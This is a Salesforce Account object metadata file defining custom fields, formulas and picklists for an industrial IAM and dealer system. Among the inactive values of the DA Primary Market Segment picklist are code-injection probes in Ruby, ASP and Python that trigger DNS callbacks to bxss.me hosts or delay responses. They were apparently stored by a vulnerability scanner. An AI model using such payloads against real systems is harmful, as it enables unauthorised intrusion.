objects/Account.object
<CustomObject>
    <fields>
        <fullName>Enable_FSL__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Enable FSL</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>EngineRangeDesc__c</fullName>
        <label>EngineRangeDesc</label>
        <length>240</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>Equipment_Available__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Equipment Available</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>FSL_Amount_Due__c</fullName>
        <description>to capture amount due for fsl customer api</description>
        <label>Amount Due</label>
        <precision>17</precision>
        <scale>2</scale>
        <type>Currency</type>
    </fields>
    <fields>
        <fullName>FSL_BMS_Instance__c</fullName>
        <inlineHelpText>Please select the suffix that aligns with the BMS instance the account is intended to be used</inlineHelpText>
        <label>BMS Instance</label>
        <type>Picklist</type>
        <valueSet>
            <restricted>true</restricted>
            <valueSetDefinition>
                <value>
                    <fullName>USA</fullName>
                </value>
                <value>
                    <fullName>CAN</fullName>
                </value>
                <value>
                    <fullName>SPL</fullName>
                </value>
                <value>
                    <fullName>CAR</fullName>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>FSL_Credit_Limit__c</fullName>
        <description>To store Credit Limit of the Customer</description>
        <label>Credit Limit</label>
        <precision>17</precision>
        <scale>2</scale>
        <type>Currency</type>
    </fields>
    <fields>
        <fullName>FSL_DLR_Onboarding__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Enable Dealer Guidanz Evolution</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>FSL_ERP_Customer_Code_Split__c</fullName>
        <description>Splitting the customer code without the suffix for IAM registration</description>
        <formula>IF(CONTAINS (FSL_ERP_Customer_Code__c, &apos;-&apos;),TRIM(LEFT(FSL_ERP_Customer_Code__c, FIND(&quot;-&quot;, FSL_ERP_Customer_Code__c)-1)), FSL_ERP_Customer_Code__c)</formula>
        <formulaTreatBlanksAs>BlankAsZero</formulaTreatBlanksAs>
        <label>ERP Customer Code Split</label>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>FSL_ERP_Customer_Code__c</fullName>
        <externalId>true</externalId>
        <label>ERP Customer Code</label>
        <length>20</length>
        <type>Text</type>
        <unique>true</unique>
    </fields>
    <fields>
        <fullName>FSL_LastRun_date__c</fullName>
        <label>Last Run Date</label>
        <type>Date</type>
    </fields>
    <fields>
        <fullName>FSL_Payer_Code__c</fullName>
        <label>Payer Account Code</label>
        <length>255</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>FSL_Payer_Name__c</fullName>
        <label>Payer Name</label>
        <length>255</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>FSL_Primary_Market_Segment__c</fullName>
        <label>Primary Market Segment</label>
        <type>Picklist</type>
        <valueSet>
            <controllingField>FSL_Source_ERP__c</controllingField>
            <valueSetDefinition>
                <value>
                    <fullName>Agriculture</fullName>
                </value>
                <value>
                    <fullName>Automotive</fullName>
                </value>
                <value>
                    <fullName>Bus</fullName>
                </value>
                <value>
                    <fullName>Construction</fullName>
                </value>
                <value>
                    <fullName>Construction &amp; Ag</fullName>
                </value>
                <value>
                    <fullName>Consumer Sales</fullName>
                </value>
                <value>
                    <fullName>Defense</fullName>
                </value>
                <value>
                    <fullName>Emergency Vehicles</fullName>
                </value>
                <value>
                    <fullName>Fire Pump</fullName>
                </value>
                <value>
                    <fullName>Generator</fullName>
                </value>
                <value>
                    <fullName>HD Truck</fullName>
                </value>
                <value>
                    <fullName>Integrated Gas Business</fullName>
                </value>
                <value>
                    <fullName>Light Truck</fullName>
                </value>
                <value>
                    <fullName>Logging</fullName>
                </value>
                <value>
                    <fullName>MD Truck</fullName>
                </value>
                <value>
                    <fullName>Military</fullName>
                </value>
                <value>
                    <fullName>Mining</fullName>
                </value>
                <value>
                    <fullName>Oil &amp; Gas</fullName>
                </value>
                <value>
                    <fullName>On-Hwy Dealers</fullName>
                </value>
                <value>
                    <fullName>On-Hwy Leasing</fullName>
                </value>
                <value>
                    <fullName>On-Hwy Other</fullName>
                </value>
                <value>
                    <fullName>Other Industrial</fullName>
                </value>
                <value>
                    <fullName>Power Gen- Other</fullName>
                </value>
                <value>
                    <fullName>Railcar</fullName>
                </value>
                <value>
                    <fullName>Recreational Vehicle</fullName>
                </value>
                <value>
                    <fullName>Refuse</fullName>
                </value>
                <value>
                    <fullName>School Bus</fullName>
                </value>
                <value>
                    <fullName>Solutions</fullName>
                </value>
                <value>
                    <fullName>Standby Commercial and Transfer Switch</fullName>
                </value>
                <value>
                    <fullName>Strategic Data Centers</fullName>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>FSL_Source_ERP__c</fullName>
        <defaultValue>CASE($User.ERP__c, &quot;BMS&quot;, &quot;BMS&quot;, &quot;MOVEX&quot;, &quot;MOVEX&quot;, &quot;MOVEX-MYD&quot;, &quot;MOVEX-MYD&quot;, &quot;MOVEX-UK&quot;, &quot;MOVEX-UK&quot;, &quot;MOVEX-190&quot;,&quot;MOVEX-190&quot;,&quot;MOVEX-200&quot;,&quot;MOVEX-200&quot;,&quot;MOVEX-250&quot;,&quot;MOVEX-250&quot;,&quot;MOVEX-270&quot;,&quot;MOVEX-270&quot;,&quot;MOVEX-175&quot;,&quot;MOVEX-175&quot;,&quot;MOVEX-CDK&quot;,&quot;MOVEX-CDK&quot;,&quot;MOVEX-CSP&quot;,&quot;MOVEX-CSP&quot;,&quot;&quot;)</defaultValue>
        <label>Source ERP</label>
        <type>Picklist</type>
        <valueSet>
            <restricted>true</restricted>
            <valueSetDefinition>
                <value>
                    <fullName>BMS</fullName>
                </value>
                <value>
                    <fullName>MOVEX</fullName>
                </value>
                <value>
                    <fullName>MOVEX-MYD</fullName>
                </value>
                <value>
                    <fullName>MOVEX-UK</fullName>
                </value>
                <value>
                    <fullName>MOVEX-190</fullName>
                </value>
                <value>
                    <fullName>MOVEX-200</fullName>
                </value>
                <value>
                    <fullName>MOVEX-250</fullName>
                </value>
                <value>
                    <fullName>MOVEX-270</fullName>
                </value>
                <value>
                    <fullName>MOVEX-175</fullName>
                </value>
                <value>
                    <fullName>MOVEX-CSP</fullName>
                </value>
                <value>
                    <fullName>MOVEX-CDK</fullName>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>FSL_Tax_District__c</fullName>
        <label>Tax District</label>
        <type>Picklist</type>
        <valueSet>
            <restricted>true</restricted>
            <valueSetDefinition>
                <value>
                    <fullName>BC</fullName>
                </value>
                <value>
                    <fullName>CAN</fullName>
                </value>
                <value>
                    <fullName>CATANO</fullName>
                </value>
                <value>
                    <fullName>CATANOL</fullName>
                </value>
                <value>
                    <fullName>EXE</fullName>
                </value>
                <value>
                    <fullName>EXP</fullName>
                </value>
                <value>
                    <fullName>GOV</fullName>
                </value>
                <value>
                    <fullName>GST</fullName>
                </value>
                <value>
                    <fullName>GSTEXEMPT</fullName>
                </value>
                <value>
                    <fullName>INTERNAL</fullName>
                </value>
                <value>
                    <fullName>LLOYD</fullName>
                </value>
                <value>
                    <fullName>NF</fullName>
                </value>
                <value>
                    <fullName>NON</fullName>
                </value>
                <value>
                    <fullName>NOTAX</fullName>
                </value>
                <value>
                    <fullName>ONT</fullName>
                </value>
                <value>
                    <fullName>OOCAN</fullName>
                </value>
                <value>
                    <fullName>OOPR</fullName>
                </value>
                <value>
                    <fullName>OOST</fullName>
                </value>
                <value>
                    <fullName>PR</fullName>
                </value>
                <value>
                    <fullName>PR_EX</fullName>
                </value>
                <value>
                    <fullName>PR_EX1</fullName>
                </value>
                <value>
                    <fullName>PR_EX2</fullName>
                </value>
                <value>
                    <fullName>PR_EX3</fullName>
                </value>
                <value>
                    <fullName>PR_EX4</fullName>
                </value>
                <value>
                    <fullName>PRX</fullName>
                </value>
                <value>
                    <fullName>SASK-GOV&apos;T</fullName>
                </value>
                <value>
                    <fullName>PRCC</fullName>
                </value>
                <value>
                    <fullName>xx</fullName>
                </value>
                <value>
                    <fullName>CATANOX</fullName>
                </value>
                <value>
                    <fullName>TEST</fullName>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>Fault_Code_Data_Last_Transfer__c</fullName>
        <label>Fault Code Data Last Transfer</label>
        <type>DateTime</type>
    </fields>
    <fields>
        <fullName>Fault_Code_Data_Receive_from_CSS__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Fault Code Data Receive from CSS</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Freeze_Submit_Button__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Freeze_Submit_Button</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Group_Name__c</fullName>
        <label>Group_Name</label>
        <length>30</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>GroupemailID__c</fullName>
        <label>GroupemailID</label>
        <type>Email</type>
    </fields>
    <fields>
        <fullName>IAM_ABO_Code_Formula__c</fullName>
        <formula>CASE(IAM_WWSPS_Regions__c,
&quot;US and Canada&quot;,&quot;1&quot;,
&quot;Europe&quot;,&quot;3&quot;,
&quot;Africa&quot;,&quot;4&quot;,
&quot;Middle East&quot;,&quot;5&quot;,
&quot;Latin America&quot;,&quot;6&quot;,
&quot;Mexico&quot;,&quot;8&quot;,
&quot;Southeast Asia&quot;,&quot;10&quot;,
&quot;South Pacific&quot;,&quot;11&quot;,
&quot;East Asia&quot;,&quot;12&quot;,
&quot;India&quot;,&quot;13&quot;,
&quot;CIS&quot;,&quot;15&quot;,
&quot;Japan&quot;,&quot;16&quot;,
&quot;Korea&quot;,&quot;17&quot;,
Null)</formula>
        <formulaTreatBlanksAs>BlankAsZero</formulaTreatBlanksAs>
        <label>ABO_Code</label>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Account_Change__c</fullName>
        <defaultValue>false</defaultValue>
        <description>Field used to by pass the custom validation we do when a user is moved from one location to another location</description>
        <label>Account Change</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IAM_CDH_Sync__c</fullName>
        <defaultValue>false</defaultValue>
        <label>IAM_CDH_Sync</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IAM_CIHR_Change_Password_Flow__c</fullName>
        <defaultValue>false</defaultValue>
        <label>CIHR Change Password Flow</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IAM_Cummins_Support_User__c</fullName>
        <deleteConstraint>SetNull</deleteConstraint>
        <description>This field is used to map the appropriate Cummins support user.</description>
        <label>User(Cummins Representative)</label>
        <referenceTo>User</referenceTo>
        <relationshipName>Accounts</relationshipName>
        <type>Lookup</type>
    </fields>
    <fields>
        <fullName>IAM_Customer_Care_Email__c</fullName>
        <formula>$Label.IAM_Customer_Care_Email</formula>
        <formulaTreatBlanksAs>BlankAsZero</formulaTreatBlanksAs>
        <label>IAM Customer Care Email</label>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Distributor_Access__c</fullName>
        <defaultValue>false</defaultValue>
        <label>IAM Distributor Access</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IAM_ECN__c</fullName>
        <description>Cummins Enterprise Customer Number</description>
        <inlineHelpText>Cummins Enterprise Customer Number</inlineHelpText>
        <label>ECN</label>
        <length>32</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Filtration_Channel_Of_Distribution__c</fullName>
        <label>Filtration Channel Of Distribution</label>
        <type>Picklist</type>
        <valueSet>
            <restricted>true</restricted>
            <valueSetDefinition>
                <sorted>true</sorted>
                <value>
                    <fullName>AFFILIATE SALES ASSOCIA</fullName>
                </value>
                <value>
                    <fullName>BUS OEM</fullName>
                </value>
                <value>
                    <fullName>BUS - OTHER</fullName>
                </value>
                <value>
                    <fullName>CAREER CENTERS</fullName>
                </value>
                <value>
                    <fullName>CIHR</fullName>
                </value>
                <value>
                    <fullName>CONTRACTED ALTERNATOR SP</fullName>
                </value>
                <value>
                    <fullName>DEALER</fullName>
                </value>
                <value>
                    <fullName>DISTRIBUTOR-BRANCH</fullName>
                </value>
                <value>
                    <fullName>DISTRIBUTOR-HEADQUARTERS</fullName>
                </value>
                <value>
                    <fullName>END USER</fullName>
                </value>
                <value>
                    <fullName>EXPORT HOUSE</fullName>
                </value>
                <value>
                    <fullName>FEDERAL GOVERNMENT</fullName>
                </value>
                <value>
                    <fullName>FLEET</fullName>
                </value>
                <value>
                    <fullName>FLEETGUARD DEALER</fullName>
                </value>
                <value>
                    <fullName>FLEETGUARD DISTRIBUTOR</fullName>
                </value>
                <value>
                    <fullName>FLEETGUARD HEAD QUARTER</fullName>
                </value>
                <value>
                    <fullName>FUEL SYSTEMS ASSOCIATE</fullName>
                </value>
                <value>
                    <fullName>FUEL SYSTEMS SPECIALIST</fullName>
                </value>
                <value>
                    <fullName>GOEM</fullName>
                </value>
                <value>
                    <fullName>HOLSET - DEALER</fullName>
                </value>
                <value>
                    <fullName>HOLSET - DISTRIBUTOR</fullName>
                </value>
                <value>
                    <fullName>HOLSET - HEAD QUARTER</fullName>
                </value>
                <value>
                    <fullName>INDEPENDENT AFTER MARKET</fullName>
                </value>
                <value>
                    <fullName>INDUSTRIAL/VOCATIONAL</fullName>
                </value>
                <value>
                    <fullName>MAJOR LEASING CO. ACCTS.</fullName>
                </value>
                <value>
                    <fullName>NATIONAL ACCOUNT-REFUSE</fullName>
                </value>
                <value>
                    <fullName>NATIONAL ACCT_CIHR - HQ</fullName>
                </value>
                <value>
                    <fullName>NATIONAL ACCT AUTO</fullName>
                </value>
                <value>
                    <fullName>NATIONAL ACCT - FIRST STUDENT</fullName>
                </value>
                <value>
                    <fullName>NATIONAL ACCT INDUSTRIAL</fullName>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>IAM_Fleet_Code_Auto_Number__c</fullName>
        <description>this field to update the customer code field depending upon the account type and it needs to be used for Fleet /Individual account only</description>
        <displayFormat>{000000000}</displayFormat>
        <label>Fleet Code Auto Number</label>
        <type>AutoNumber</type>
    </fields>
    <fields>
        <fullName>IAM_For_W_Code_Creation_From_WWSPS__c</fullName>
        <defaultValue>false</defaultValue>
        <description>Field is used to capture the checkbox and make it as true if we get record details from account creation service and source of the record is WWSPS</description>
        <label>For W Code Creation From WWSPS</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IAM_Internal_Account__c</fullName>
        <defaultValue>false</defaultValue>
        <description>Field describes if a location is internal or external location</description>
        <label>Cummins Owned Location?</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IAM_InviteUser_URL__c</fullName>
        <formula>$Label.IAM_InviteUserURL</formula>
        <formulaTreatBlanksAs>BlankAsZero</formulaTreatBlanksAs>
        <label>IAM_InviteUser_URL</label>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Movex_Customer_Code__c</fullName>
        <label>Order Management Account Code</label>
        <length>240</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_National_Code_Auto_Number__c</fullName>
        <description>This field is to be used to update the customer code field depending upon the type of the account this field is for National Accounts</description>
        <displayFormat>N{00000000}</displayFormat>
        <label>National Code Auto Number</label>
        <type>AutoNumber</type>
    </fields>
    <fields>
        <fullName>IAM_Order_Management_Account_Name__c</fullName>
        <description>It stores ERP system name for CUMPAS locations</description>
        <label>Order Management Account Name</label>
        <length>20</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Partner_Location_Code__c</fullName>
        <description>This field is used to store the location unique code of Partner Companies.
The Source of this field is WWSPS.</description>
        <label>Partner Location Code</label>
        <length>15</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Primary_Market_Segment__c</fullName>
        <label>DA Primary Market Segment</label>
        <type>Picklist</type>
        <valueSet>
            <restricted>true</restricted>
            <valueSetDefinition>
                <value>
                    <fullName>Agriculture</fullName>
                </value>
                <value>
                    <fullName>Automotive</fullName>
                </value>
                <value>
                    <fullName>Bus</fullName>
                </value>
                <value>
                    <fullName>Construction</fullName>
                </value>
                <value>
                    <fullName>Emergency Vehicles</fullName>
                </value>
                <value>
                    <fullName>Fire Pump</fullName>
                </value>
                <value>
                    <fullName>Generator</fullName>
                </value>
                <value>
                    <fullName>Light Truck</fullName>
                </value>
                <value>
                    <fullName>Logging</fullName>
                </value>
                <value>
                    <fullName>Marine</fullName>
                </value>
                <value>
                    <fullName>Military</fullName>
                </value>
                <value>
                    <fullName>Mining</fullName>
                </value>
                <value>
                    <fullName>Oil &amp; Gas</fullName>
                </value>
                <value>
                    <fullName>Railcar</fullName>
                </value>
                <value>
                    <fullName>Recreational Vehicle</fullName>
                </value>
                <value>
                    <fullName>!(()&amp;&amp;!|*|*|</fullName>
                    <isActive>false</isActive>
                    <label>!(()&amp;&amp;!|*|*|</label>
                </value>
                <value>
                    <fullName>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(107).concat(82).concat(98).concat(67)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitlu&quot;+&quot;mrnwjnzke3f27.bxss.me.&quot;)[3].to_s)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(107).concat(82).concat(98).concat(67)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitlu&quot;+&quot;mrnwjnzke3f27.bxss.me.&quot;)[3].to_s)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(108).concat(68).concat(98).concat(74)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitgi&quot;+&quot;mlwzmigv47f54.bxss.me.&quot;)[3].to_s)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(108).concat(68).concat(98).concat(74)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitgi&quot;+&quot;mlwzmigv47f54.bxss.me.&quot;)[3].to_s)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(112).concat(72).concat(113).concat(83)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitmw&quot;+&quot;lnyfekznf0941.bxss.me.&quot;)[3].to_s)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(112).concat(72).concat(113).concat(83)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitmw&quot;+&quot;lnyfekznf0941.bxss.me.&quot;)[3].to_s)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(113).concat(66).concat(119).concat(86)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitjn&quot;+&quot;bukmgeopf68af.bxss.me.&quot;)[3].to_s)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(113).concat(66).concat(119).concat(86)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitjn&quot;+&quot;bukmgeopf68af.bxss.me.&quot;)[3].to_s)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(120).concat(72).concat(114).concat(82)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitga&quot;+&quot;otfagvbt1c5af.bxss.me.&quot;)[3].to_s)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+&quot;A&quot;.concat(70-3).concat(22*4).concat(120).concat(72).concat(114).concat(82)+(require&quot;socket&quot;
Socket.gethostbyname(&quot;hitga&quot;+&quot;otfagvbt1c5af.bxss.me.&quot;)[3].to_s)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+response.write(9576256*9287231)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+response.write(9576256*9287231)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+response.write(9610140*9420886)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+response.write(9610140*9420886)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+response.write(9666611*9950581)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+response.write(9666611*9950581)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+response.write(9740943*9718280)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+response.write(9740943*9718280)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+response.write(9845013*9085753)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+response.write(9845013*9085753)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitfasjnzalrv998fe.&apos;+&apos;bxss.me&apos;)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitfasjnzalrv998fe.&apos;+&apos;bxss.me&apos;)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitgnacktysys192ea.&apos;+&apos;bxss.me&apos;)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitgnacktysys192ea.&apos;+&apos;bxss.me&apos;)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitiuvljyouit3004e.&apos;+&apos;bxss.me&apos;)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitiuvljyouit3004e.&apos;+&apos;bxss.me&apos;)+&quot;</label>
                </value>
                <value>
                    <fullName>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitsdjhuiodlzbab87.&apos;+&apos;bxss.me&apos;)+&quot;</fullName>
                    <isActive>false</isActive>
                    <label>&quot;+str(__import__(&apos;time&apos;).sleep(9))+__import__(&apos;socket&apos;).gethostbyname(&apos;hitsdjhuiodlzbab87.&apos;+&apos;bxss.me&apos;)+&quot;</label>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>IAM_Service_Provider_Code__c</fullName>
        <externalId>true</externalId>
        <inlineHelpText>This field shows all types of Codes depending upon the Type of the Account.</inlineHelpText>
        <label>Customer Code</label>
        <length>20</length>
        <type>Text</type>
        <unique>true</unique>
    </fields>
    <fields>
        <fullName>IAM_Verification_code__c</fullName>
        <label>Verification code</label>
        <length>18</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Verified_Flag__c</fullName>
        <label>Verified Flag</label>
        <length>2</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_Votek_Auto_Number__c</fullName>
        <description>field to get populate the data for Account type Votek.</description>
        <displayFormat>V{0000000}</displayFormat>
        <label>Votek Code Auto Number</label>
        <type>AutoNumber</type>
    </fields>
    <fields>
        <fullName>IAM_WWSPS_Regions__c</fullName>
        <description>Regions from WWSPS</description>
        <label>Account Region</label>
        <type>Picklist</type>
        <valueSet>
            <restricted>true</restricted>
            <valueSetDefinition>
                <sorted>true</sorted>
                <value>
                    <fullName>Africa</fullName>
                </value>
                <value>
                    <fullName>CIS</fullName>
                </value>
                <value>
                    <fullName>East Asia</fullName>
                </value>
                <value>
                    <fullName>Europe</fullName>
                </value>
                <value>
                    <fullName>India</fullName>
                </value>
                <value>
                    <fullName>Japan</fullName>
                </value>
                <value>
                    <fullName>Korea</fullName>
                </value>
                <value>
                    <fullName>Latin America</fullName>
                </value>
                <value>
                    <fullName>Mexico</fullName>
                </value>
                <value>
                    <fullName>Middle East</fullName>
                </value>
                <value>
                    <fullName>Southeast Asia</fullName>
                </value>
                <value>
                    <fullName>South Pacific</fullName>
                </value>
                <value>
                    <fullName>US and Canada</fullName>
                </value>
            </valueSetDefinition>
        </valueSet>
    </fields>
    <fields>
        <fullName>IAM_adminlogin_url__c</fullName>
        <defaultValue>&quot;https://adminportal-stg.cummins.com&quot;</defaultValue>
        <label>IAM_adminlogin_url</label>
        <length>100</length>
        <type>Text</type>
    </fields>
    <fields>
        <fullName>IAM_from_Registration__c</fullName>
        <defaultValue>false</defaultValue>
        <label>from_Registration</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IA_CSSEnabled__c</fullName>
        <defaultValue>true</defaultValue>
        <label>IA CSSEnabled</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Invoice_Ready__c</fullName>
        <defaultValue>false</defaultValue>
        <inlineHelpText>Applicable for North America only.</inlineHelpText>
        <label>Invoice Ready</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>IsOneBMSFailure__c</fullName>
        <defaultValue>false</defaultValue>
        <description>This field is used to check one BMS API failure</description>
        <label>IsOneBMSFailure</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Is_Active_Subscription_Exists__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Is Active Subscription Exists?</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Is_Coupon_Already_Used__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Is Coupon Already Used</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Is_Internal_Account__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Is Internal Account</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Is_OEM_Acount__c</fullName>
        <formula>AND( RecordType.DeveloperName = &apos;WWSPS&apos;, OR( ISPICKVAL(  EBU_Channel_of_Distribution__c , &apos;BUS OEM&apos;),ISPICKVAL(  EBU_Channel_of_Distribution__c , &apos;OTHER OEM&apos;),ISPICKVAL(  EBU_Channel_of_Distribution__c , &apos;OTHER DOEM&apos;) ) )</formula>
        <formulaTreatBlanksAs>BlankAsZero</formulaTreatBlanksAs>
        <label>Is OEM Acount</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Is_Partner_Account__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Is Partner Account?</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>Is_Training_Account__c</fullName>
        <defaultValue>false</defaultValue>
        <label>Is Training Account</label>
        <type>Checkbox</type>
    </fields>
    <fields>
        <fullName>LTA_Flag__c</fullName>
        <defaultValue>false</defaultValue>
        <label>LTA_Flag</label>
        <type>Checkbox</type>
    </fields>
</CustomObject>